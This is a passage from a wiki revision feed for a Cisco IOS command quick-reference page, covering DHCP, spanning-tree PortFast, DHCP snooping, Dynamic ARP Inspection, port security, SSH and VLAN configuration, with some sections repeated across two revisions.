* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches or routers.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding attacks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1074</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1074"/>
		<updated>2026-02-04T22:26:36Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
interface range fa0/2-3,g0/1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk VLAN Settings ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
switchport trunk native vlan 99&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
